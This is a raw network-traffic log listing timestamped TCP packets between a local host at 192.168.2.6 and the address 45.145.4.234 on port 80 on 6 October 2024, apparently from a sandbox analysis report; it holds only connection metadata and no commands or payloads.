                                                                                                                                                Oct 6, 2024 22:18:48.579885006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579902887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579910040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579915047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579926968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579927921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579933882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579940081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579946041 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579946995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579952955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579974890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579997063 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580161095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580173016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580198050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580199003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580210924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580221891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580233097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580233097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580259085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580284119 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580430984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580440998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580451012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580461025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580470085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580475092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580482006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580493927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580502033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580519915 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580528975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580539942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580543995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580550909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580563068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580562115 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580573082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580579996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580583096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580595016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580599070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580605984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.580626011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.580642939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663440943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663522959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663533926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663543940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663552999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663563013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663574934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663623095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663645029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663685083 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663743019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663753986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663764000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663773060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663775921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663815975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663853884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663865089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663873911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663882971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663896084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663897038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663908958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663917065 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663918018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663932085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.663947105 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.663973093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664124966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664135933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664144039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664159060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664174080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664285898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664295912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664304972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664314985 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664318085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664326906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664336920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664346933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664350033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664355993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664355040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664382935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664403915 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664551020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664561987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664577007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664586067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664593935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664602995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664602995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664609909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664619923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664630890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664630890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664630890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664645910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664674997 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664836884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664846897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664879084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664928913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664938927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664947987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664956093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664966106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664966106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664974928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.664983988 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.664988041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665000916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665009975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665009975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665020943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665030003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665055990 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665389061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665400028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665410042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665420055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665429115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665438890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665448904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665452003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665452003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665453911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665467024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665472984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665478945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665488958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665489912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665549040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665644884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665674925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665683985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665683985 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665695906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665707111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665720940 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665736914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665880919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665889978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665899992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665910006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665920019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665920973 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665930986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665941954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665946007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665960073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665963888 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665973902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665980101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.665983915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.665994883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666002989 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.666009903 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666017056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666026115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666029930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.666032076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666044950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.666071892 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.666516066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666527033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666536093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666544914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666553974 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.666554928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666567087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666575909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666582108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.666587114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666593075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666596889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666601896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666606903 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666609049 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.666613102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666618109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666624069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666632891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666639090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666642904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.666717052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667011976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667022943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667032003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667041063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667047977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667058945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667082071 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667094946 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667160988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667176008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667181969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667190075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667196035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667196989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667212963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667238951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667439938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667449951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667462111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667473078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667485952 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667490959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667496920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667500973 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667507887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667520046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667527914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667531967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667543888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.667556047 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.667573929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750441074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750449896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750457048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750464916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750467062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750471115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750514030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750555992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750562906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750576973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750593901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750602961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750602961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750626087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750643969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750790119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750802994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750818014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750828981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750839949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750843048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750850916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750863075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750874043 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750890970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750897884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.750926018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750946045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.750989914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751000881 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751015902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751028061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751038074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751040936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751060009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751085043 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751121998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751132011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751148939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751159906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751168013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751171112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751198053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751205921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751374960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751391888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751401901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751411915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751418114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751425028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751435995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751446962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751456976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751457930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751472950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751477003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751483917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751497984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751507044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751544952 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751712084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751728058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751738071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751748085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751748085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751760960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751776934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751808882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751830101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751841068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751868963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751904011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.751965046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751974106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751979113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751988888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.751997948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752007961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752017975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752018929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752027988 CEST6388580192.168.2.645.145.4.234
